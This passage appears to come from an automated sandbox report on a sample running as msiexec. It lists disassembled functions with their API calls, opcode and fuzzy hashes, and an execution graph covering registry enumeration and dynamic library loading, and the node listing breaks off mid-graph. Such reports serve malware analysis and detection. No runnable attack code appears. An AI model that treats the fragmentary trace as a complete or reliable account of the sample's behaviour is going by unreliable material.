                                                                                        • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                                        Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@$memset
                                                                                        • String ID:
                                                                                        • API String ID: 1860491036-0
                                                                                        • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                        • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                        • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                                        • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                        Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • wcslen.MSVCRT ref: 0040A8E2
                                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                        • free.MSVCRT ref: 0040A908
                                                                                        • free.MSVCRT ref: 0040A92B
                                                                                        • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$memcpy$mallocwcslen
                                                                                        • String ID:
                                                                                        • API String ID: 726966127-0
                                                                                        • Opcode ID: 9067421bb5060c399d83e8366b459fd1559f14f7a756e12873c92b79cc47865f
                                                                                        • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                        • Opcode Fuzzy Hash: 9067421bb5060c399d83e8366b459fd1559f14f7a756e12873c92b79cc47865f
                                                                                        • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                        Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • wcslen.MSVCRT ref: 0040B1DE
                                                                                        • free.MSVCRT ref: 0040B201
                                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                        • free.MSVCRT ref: 0040B224
                                                                                        • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$memcpy$mallocwcslen
                                                                                        • String ID:
                                                                                        • API String ID: 726966127-0
                                                                                        • Opcode ID: a695ade3a7797f376f201de80decb40066d5f736b135f44090dc4a6cd17a09b2
                                                                                        • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                        • Opcode Fuzzy Hash: a695ade3a7797f376f201de80decb40066d5f736b135f44090dc4a6cd17a09b2
                                                                                        • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                        Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                          • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                          • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                          • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                        • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                        • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                        • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmp$memcpy
                                                                                        • String ID:
                                                                                        • API String ID: 231171946-0
                                                                                        • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                        • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                        • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                        • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                        Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • strlen.MSVCRT ref: 0040B0D8
                                                                                        • free.MSVCRT ref: 0040B0FB
                                                                                          • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                          • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                          • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                        • free.MSVCRT ref: 0040B12C
                                                                                        • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$memcpy$mallocstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 3669619086-0
                                                                                        • Opcode ID: ee8347e84c53985be3907e5f73125604e6f6c519928a85103321f6ac1e1b5c7d
                                                                                        • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                        • Opcode Fuzzy Hash: ee8347e84c53985be3907e5f73125604e6f6c519928a85103321f6ac1e1b5c7d
                                                                                        • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                        Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ??2@
                                                                                        • String ID:
                                                                                        • API String ID: 1033339047-0
                                                                                        • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                        • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                        • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                                        • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                                        Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                        • malloc.MSVCRT ref: 00417407
                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                        • free.MSVCRT ref: 00417425
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$freemalloc
                                                                                        • String ID:
                                                                                        • API String ID: 2605342592-0
                                                                                        • Opcode ID: 6a58532d87bfe5be5798e7c18fd69f9a5c0a4facd7f09204bf7deacabde6e419
                                                                                        • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                        • Opcode Fuzzy Hash: 6a58532d87bfe5be5798e7c18fd69f9a5c0a4facd7f09204bf7deacabde6e419
                                                                                        • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                        Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000A.00000002.2643158335.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcslen$wcscat$wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1961120804-0
                                                                                        • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                        • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                        • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                        • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                        Execution Graph

                                                                                        Execution Coverage:2.1%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:0.5%
                                                                                        Total number of Nodes:761
                                                                                        Total number of Limit Nodes:20
                                                                                        execution_graph 34016 40fc40 70 API calls 34192 403640 21 API calls 34017 427fa4 42 API calls 34193 412e43 _endthreadex 34194 425115 76 API calls __fprintf_l 34195 43fe40 133 API calls 34020 425115 83 API calls __fprintf_l 34021 401445 memcpy memcpy DialogBoxParamA 34022 440c40 34 API calls 33240 444c4a 33259 444e38 33240->33259 33242 444c56 GetModuleHandleA 33245 444c68 __set_app_type __p__fmode __p__commode 33242->33245 33244 444cfa 33246 444d02 __setusermatherr 33244->33246 33247 444d0e 33244->33247 33245->33244 33246->33247 33260 444e22 _controlfp 33247->33260 33249 444d13 _initterm __getmainargs _initterm 33250 444d6a GetStartupInfoA 33249->33250 33252 444d9e GetModuleHandleA 33250->33252 33261 40cf44 33252->33261 33256 444dcf _cexit 33258 444e04 33256->33258 33257 444dc8 exit 33257->33256 33259->33242 33260->33249 33312 404a99 LoadLibraryA 33261->33312 33263 40cf60 33264 40cf64 33263->33264 33320 410d0e 33263->33320 33264->33256 33264->33257 33266 40cf6f 33324 40ccd7 ??2@YAPAXI 33266->33324 33268 40cf9b 33338 407cbc 33268->33338 33273 40cfc4 33357 409825 memset 33273->33357 33274 40cfd8 33362 4096f4 memset 33274->33362 33279 40d181 ??3@YAXPAX 33281 40d1b3 33279->33281 33282 40d19f DeleteObject 33279->33282 33280 407e30 _strcmpi 33283 40cfee 33280->33283 33386 407948 free free 33281->33386 33282->33281 33285 40cff2 RegDeleteKeyA 33283->33285 33286 40d007 EnumResourceTypesA 33283->33286 33285->33279 33288 40d047 33286->33288 33289 40d02f MessageBoxA 33286->33289 33287 40d1c4 33387 4080d4 free 33287->33387 33291 40d0a0 CoInitialize 33288->33291 33367 40ce70 33288->33367 33289->33279 33384 40cc26 strncat memset RegisterClassA CreateWindowExA 33291->33384 33293 40d1cd 33388 407948 free free 33293->33388 33295 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33385 40c256 PostMessageA 33295->33385 33299 40d061 ??3@YAXPAX 33299->33281 33302 40d084 DeleteObject 33299->33302 33300 40d09e 33300->33291 33302->33281 33304 40d0f9 GetMessageA 33305 40d17b CoUninitialize 33304->33305 33306 40d10d 33304->33306 33305->33279 33307 40d113 TranslateAccelerator 33306->33307 33309 40d145 IsDialogMessage 33306->33309 33310 40d139 IsDialogMessage 33306->33310 33307->33306 33308 40d16d GetMessageA 33307->33308 33308->33305 33308->33307 33309->33308 33311 40d157 TranslateMessage DispatchMessageA 33309->33311 33310->33308 33310->33309 33311->33308 33313 404ac4 GetProcAddress 33312->33313 33314 404aec 33312->33314 33315 404ad4 33313->33315 33316 404add FreeLibrary 33313->33316 33318 404b13 33314->33318 33319 404afc MessageBoxA 33314->33319 33315->33316 33316->33314 33317 404ae8 33316->33317 33317->33314 33318->33263 33319->33263 33321 410d17 LoadLibraryA 33320->33321 33322 410d3c 33320->33322 33321->33322 33323 410d2b GetProcAddress 33321->33323 33322->33266 33323->33322 33325 40cd08 ??2@YAPAXI 33324->33325 33327 40cd26 33325->33327 33328 40cd2d 33325->33328 33396 404025 6 API calls 33327->33396 33330 40cd66 33328->33330 33331 40cd59 DeleteObject 33328->33331 33389 407088 33330->33389 33331->33330 33333 40cd6b 33392 4019b5 33333->33392 33336 4019b5 strncat 33337 40cdbf _mbscpy 33336->33337 33337->33268 33398 407948 free free 33338->33398 33341 407cf7 33343 407a1f malloc memcpy free free 33341->33343 33344 407ddc 33341->33344 33346 407d7a free 33341->33346 33350 407d83 33341->33350 33352 407e04 33341->33352 33402 40796e 7 API calls 33341->33402 33343->33341 33344->33352 33404 407a1f 33344->33404 33346->33341 33350->33341 33403 406f30 malloc memcpy free 33350->33403 33399 407a55 33352->33399 33353 407e30 33354 407e57 33353->33354 33355 407e38 33353->33355 33354->33273 33354->33274 33355->33354 33356 407e41 _strcmpi 33355->33356 33356->33354 33356->33355 33412 4097ff 33357->33412 33359 409854 33417 409731 33359->33417 33363 4097ff 3 API calls 33362->33363 33364 409723 33363->33364 33437 40966c 33364->33437 33451 4023b2 33367->33451 33373 40ced3 33535 40cdda 7 API calls 33373->33535 33374 40cece 33378 40cf3f 33374->33378 33488 40c3d0 memset GetModuleFileNameA strrchr 33374->33488 33378->33299 33378->33300 33380 40ceed 33514 40affa 33380->33514 33384->33295 33385->33304 33386->33287 33387->33293 33388->33264 33397 406fc7 memset _mbscpy 33389->33397 33391 40709f CreateFontIndirectA 33391->33333 33393 4019e1 33392->33393 33394 4019c2 strncat 33393->33394 33395 4019e5 memset LoadIconA 33393->33395 33394->33393 33395->33336 33396->33328 33397->33391 33398->33341 33400 407a65 33399->33400 33401 407a5b free 33399->33401 33400->33353 33401->33400 33402->33341 33403->33350 33405 407a38 33404->33405 33406 407a2d free 33404->33406 33411 406f30 malloc memcpy free 33405->33411 33407 407a44 33406->33407 33410 40796e 7 API calls 33407->33410 33409 407a43 33409->33407 33410->33352 33411->33409 33428 406f96 GetModuleFileNameA 33412->33428 33414 409805 strrchr 33415 409814 33414->33415 33416 409817 _mbscat 33414->33416 33415->33416 33416->33359 33429 44b090 33417->33429 33422 40930c 3 API calls 33423 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33422->33423 33424 4097c5 LoadStringA 33423->33424 33425 4097db 33424->33425 33425->33424 33426 4097f3 33425->33426 33436 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33425->33436 33426->33279 33428->33414 33430 40973e _mbscpy _mbscpy 33429->33430 33431 40930c 33430->33431 33432 44b090 33431->33432 33433 409319 memset GetPrivateProfileStringA 33432->33433 33434 409374 33433->33434 33435 409364 WritePrivateProfileStringA 33433->33435 33434->33422 33435->33434 33436->33425 33447 406f81 GetFileAttributesA 33437->33447 33439 409675 33440 4096ee 33439->33440 33441 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33439->33441 33440->33280 33448 409278 GetPrivateProfileStringA 33441->33448 33443 4096c9 33449 409278 GetPrivateProfileStringA 33443->33449 33445 4096da 33450 409278 GetPrivateProfileStringA 33445->33450 33447->33439 33448->33443 33449->33445 33450->33440 33537 409c1c 33451->33537 33454 401e69 memset 33576 410dbb 33454->33576 33457 401ec2 33600 4070e3 strlen _mbscat _mbscpy _mbscat 33457->33600 33458 401ed4 33589 406f81 GetFileAttributesA 33458->33589 33461 401ee6 strlen strlen 33463 401f15 33461->33463 33464 401f28 33461->33464 33601 4070e3 strlen _mbscat _mbscpy _mbscat 33463->33601 33590 406f81 GetFileAttributesA 33464->33590 33467 401f35 33591 401c31 33467->33591 33470 401f75 33472 402165 33470->33472 33473 401f9c memset 33470->33473 33471 401c31 5 API calls 33471->33470 33475 402195 ExpandEnvironmentStringsA 33472->33475 33476 4021a8 _strcmpi 33472->33476 33602 410b62 RegEnumKeyExA 33473->33602 33608 406f81 GetFileAttributesA 33475->33608 33476->33373 33476->33374 33477 401fc9 33477->33472 33479 401fd9 atoi 33477->33479 33483 402076 memset memset strlen strlen 33477->33483 33484 4020dd strlen strlen 33477->33484 33485 4070e3 strlen _mbscat _mbscpy _mbscat 33477->33485 33486 406f81 GetFileAttributesA 33477->33486 33487 402167 _mbscpy 33477->33487 33607 410b62 RegEnumKeyExA 33477->33607 33479->33477 33480 401fef memset memset sprintf 33479->33480 33603 410b1e 33480->33603 33483->33477 33484->33477 33485->33477 33486->33477 33487->33472 33489 40c422 33488->33489 33490 40c425 _mbscat _mbscpy _mbscpy 33488->33490 33489->33490 33491 40c49d 33490->33491 33492 40c512 33491->33492 33493 40c502 GetWindowPlacement 33491->33493 33494 40c538 33492->33494 33626 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33492->33626 33493->33492 33619 409b31 33494->33619 33498 40ba28 33499 40ba87 33498->33499 33504 40ba3c 33498->33504 33629 406c62 LoadCursorA SetCursor 33499->33629 33501 40ba8c 33630 403c16 33501->33630 33696 404734 33501->33696 33704 404785 33501->33704 33707 4107f1 33501->33707 33502 40ba43 _mbsicmp 33502->33504 33503 40baa0 33505 407e30 _strcmpi 33503->33505 33504->33499 33504->33502 33710 40b5e5 10 API calls 33504->33710 33508 40bab0 33505->33508 33506 40bafa SetCursor 33506->33380 33508->33506 33509 40baf1 qsort 33508->33509 33509->33506 34000 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33514->34000 33516 40b00e 33517 40b016 33516->33517 33518 40b01f GetStdHandle 33516->33518 34001 406d1a CreateFileA 33517->34001 33520 40b01c 33518->33520 33521 40b035 33520->33521 33522 40b12d 33520->33522 34002 406c62 LoadCursorA SetCursor 33521->34002 34006 406d77 9 API calls 33522->34006 33525 40b136 33536 40c580 28 API calls 33525->33536 33526 40b087 33533 40b0a1 33526->33533 34004 40a699 12 API calls 33526->34004 33527 40b042 33527->33526 33527->33533 34003 40a57c strlen WriteFile 33527->34003 33530 40b0d6 33531 40b116 CloseHandle 33530->33531 33532 40b11f SetCursor 33530->33532 33531->33532 33532->33525 33533->33530 34005 406d77 9 API calls 33533->34005 33535->33374 33536->33378 33549 409a32 33537->33549 33540 409c80 memcpy memcpy 33545 409cda 33540->33545 33541 408db6 12 API calls 33541->33545 33542 409d18 ??2@YAPAXI ??2@YAPAXI 33543 409d54 ??2@YAPAXI 33542->33543 33546 409d8b 33542->33546 33543->33546 33545->33540 33545->33541 33545->33542 33546->33546 33559 409b9c 33546->33559 33548 4023c1 33548->33454 33550 409a44 33549->33550 33551 409a3d ??3@YAXPAX 33549->33551 33552 409a52 33550->33552 33553 409a4b ??3@YAXPAX 33550->33553 33551->33550 33554 409a63 33552->33554 33555 409a5c ??3@YAXPAX 33552->33555 33553->33552 33556 409a83 ??2@YAPAXI ??2@YAPAXI 33554->33556 33557 409a73 ??3@YAXPAX 33554->33557 33558 409a7c ??3@YAXPAX 33554->33558 33555->33554 33556->33540 33557->33558 33558->33556 33560 407a55 free 33559->33560 33561 409ba5 33560->33561 33562 407a55 free 33561->33562 33563 409bad 33562->33563 33564 407a55 free 33563->33564 33565 409bb5 33564->33565 33566 407a55 free 33565->33566 33567 409bbd 33566->33567 33568 407a1f 4 API calls 33567->33568 33569 409bd0 33568->33569 33570 407a1f 4 API calls 33569->33570 33571 409bda 33570->33571 33572 407a1f 4 API calls 33571->33572 33573 409be4 33572->33573 33574 407a1f 4 API calls 33573->33574 33575 409bee 33574->33575 33575->33548 33577 410d0e 2 API calls 33576->33577 33578 410dca 33577->33578 33579 410dfd memset 33578->33579 33609 4070ae 33578->33609 33582 410e1d 33579->33582 33584 410e7f _mbscpy 33582->33584 33612 410d3d _mbscpy 33582->33612 33583 401e9e strlen strlen 33583->33457 33583->33458 33584->33583 33586 410e5b 33613 410add RegQueryValueExA 33586->33613 33588 410e73 33588->33584 33589->33461 33590->33467 33592 401c4c 33591->33592 33593 401ca1 33592->33593 33614 410add RegQueryValueExA 33592->33614 33593->33470 33593->33471 33595 401c6a 33595->33593 33596 401c71 strchr 33595->33596 33596->33593 33597 401c85 strchr 33596->33597 33597->33593 33598 401c94 33597->33598 33615 406f06 strlen 33598->33615 33600->33458 33601->33464 33602->33477 33604 410b34 33603->33604 33606 410b4c 33604->33606 33618 410add RegQueryValueExA 33604->33618 33606->33477 33607->33477 33608->33476 33610 4070bd GetVersionExA 33609->33610 33611 4070ce 33609->33611 33610->33611 33611->33579 33611->33583 33612->33586 33613->33588 33614->33595 33616 406f17 33615->33616 33617 406f1a memcpy 33615->33617 33616->33617 33617->33593 33618->33606 33620 409b40 33619->33620 33622 409b4e 33619->33622 33627 409901 memset SendMessageA 33620->33627 33623 409b99 33622->33623 33624 409b8b 33622->33624 33623->33498 33628 409868 SendMessageA 33624->33628 33626->33494 33627->33622 33628->33623 33629->33501 33631 4107f1 FreeLibrary 33630->33631 33632 403c30 LoadLibraryA 33631->33632 33633 403c74 33632->33633 33634 403c44 GetProcAddress 33632->33634 33636 4107f1 FreeLibrary 33633->33636 33634->33633 33635 403c5e 33634->33635 33635->33633 33639 403c6b 33635->33639 33637 403c7b 33636->33637 33638 404734 3 API calls 33637->33638 33640 403c86 33638->33640 33639->33637 33711 4036e5 33640->33711 33643 4036e5 23 API calls 33644 403c9a 33643->33644 33645 4036e5 23 API calls 33644->33645 33646 403ca4 33645->33646 33647 4036e5 23 API calls 33646->33647 33648 403cae 33647->33648 33721 4085d2 33648->33721 33654 403cd2 33656 403cf7 33654->33656 33873 402bd1 37 API calls 33654->33873 33657 403d1c 33656->33657 33874 402bd1 37 API calls 33656->33874 33756 402c5d 33657->33756 33661 4070ae GetVersionExA 33662 403d31 33661->33662 33664 403d61 33662->33664 33875 402b22 42 API calls 33662->33875 33666 403d97 33664->33666 33876 402b22 42 API calls 33664->33876 33667 403dcd 33666->33667 33877 402b22 42 API calls 33666->33877 33768 410808 33667->33768 33671 404785 FreeLibrary 33672 403de8 33671->33672 33772 402fdb 33672->33772 33675 402fdb 29 API calls 33676 403e00 33675->33676 33784 4032b7 33676->33784 33685 403e3b 33687 403e73 33685->33687 33688 403e46 _mbscpy 33685->33688 33831 40fb00 33687->33831 33879 40f334 333 API calls 33688->33879 33697 404785 FreeLibrary 33696->33697 33698 40473b LoadLibraryA 33697->33698 33699 40474c GetProcAddress 33698->33699 33700 40476e 33698->33700 33699->33700 33701 404764 33699->33701 33702 404781 33700->33702 33703 404785 FreeLibrary 33700->33703 33701->33700 33702->33503 33703->33702 33705 4047a3 33704->33705 33706 404799 FreeLibrary 33704->33706 33705->33503 33706->33705 33708 410807 33707->33708 33709 4107fc FreeLibrary 33707->33709 33708->33503 33709->33708 33710->33504 33712 4037c5 33711->33712 33713 4036fb 33711->33713 33712->33643 33713->33712 33714 403716 strchr 33713->33714 33714->33712 33715 403730 33714->33715 33880 4021b6 memset 33715->33880 33717 40373f _mbscpy _mbscpy strlen 33718 4037a4 _mbscpy 33717->33718 33719 403789 sprintf 33717->33719 33881 4023e5 16 API calls 33718->33881 33719->33718 33722 4085e2 33721->33722 33882 4082cd 11 API calls 33722->33882 33724 4085ec 33725 403cba 33724->33725 33726 40860b memset 33724->33726 33733 40821d 33725->33733 33884 410b62 RegEnumKeyExA 33726->33884 33728 408637 33728->33725 33729 40865c memset 33728->33729 33886 40848b 10 API calls 33728->33886 33887 410b62 RegEnumKeyExA 33728->33887 33885 410add RegQueryValueExA 33729->33885 33734 40823f 33733->33734 33735 403cc6 33734->33735 33736 408246 memset 33734->33736 33741 4086e0 33735->33741 33888 410b62 RegEnumKeyExA 33736->33888 33738 40826f 33738->33735 33889 4080ed 11 API calls 33738->33889 33890 410b62 RegEnumKeyExA 33738->33890 33891 4045db 33741->33891 33743 4088ef 33899 404656 33743->33899 33747 408737 wcslen 33747->33743 33753 40876a 33747->33753 33748 40877a wcsncmp 33748->33753 33750 404734 3 API calls 33750->33753 33751 404785 FreeLibrary 33751->33753 33752 408812 memset 33752->33753 33754 40883c memcpy wcschr 33752->33754 33753->33743 33753->33748 33753->33750 33753->33751 33753->33752 33753->33754 33755 4088c3 LocalFree 33753->33755 33902 40466b _mbscpy 33753->33902 33754->33753 33755->33753 33757 402c7a 33756->33757 33758 402c87 memset 33757->33758 33767 402d9a 33757->33767 33903 410b62 RegEnumKeyExA 33758->33903 33760 402cb2 33761 410b1e RegQueryValueExA 33760->33761 33763 402d3a sprintf 33760->33763 33760->33767 33904 402bd1 37 API calls 33760->33904 33905 402bd1 37 API calls 33760->33905 33906 410b62 RegEnumKeyExA 33760->33906 33762 402ce4 memset sprintf 33761->33762 33762->33760 33763->33760 33767->33661 33771 410816 33768->33771 33769 4107f1 FreeLibrary 33770 403ddd 33769->33770 33770->33671 33771->33769 33773 402ff9 33772->33773 33774 403006 memset 33773->33774 33776 403122 33773->33776 33907 410b62 RegEnumKeyExA 33774->33907 33776->33675 33777 410b1e RegQueryValueExA 33778 403058 memset sprintf 33777->33778 33782 403033 33778->33782 33779 4030a2 memset 33908 410b62 RegEnumKeyExA 33779->33908 33782->33776 33782->33777 33782->33779 33783 410b62 RegEnumKeyExA 33782->33783 33909 402db3 24 API calls 33782->33909 33783->33782 33785 4032d5 33784->33785 33786 4033a9 33784->33786 33910 4021b6 memset 33785->33910 33799 4034e4 memset memset 33786->33799 33788 4032e1 33911 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33788->33911 33790 4032ea 33791 4032f8 memset GetPrivateProfileSectionA 33790->33791 33912 4023e5 16 API calls 33790->33912 33791->33786 33796 40332f 33791->33796 33793 40339b strlen 33793->33786 33793->33796 33795 403350 strchr 33795->33796 33796->33786 33796->33793 33913 4021b6 memset 33796->33913 33914 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33796->33914 33915 4023e5 16 API calls 33796->33915 33800 410b1e RegQueryValueExA 33799->33800 33801 40353f 33800->33801 33802 40357f 33801->33802 33803 403546 _mbscpy 33801->33803 33807 403985 33802->33807 33916 406d55 strlen _mbscat 33803->33916 33805 403565 _mbscat 33917 4033f0 19 API calls 33805->33917 33918 40466b _mbscpy 33807->33918 33811 4039aa 33813 4039ff 33811->33813 33919 40f6e2 33811->33919 33935 40f460 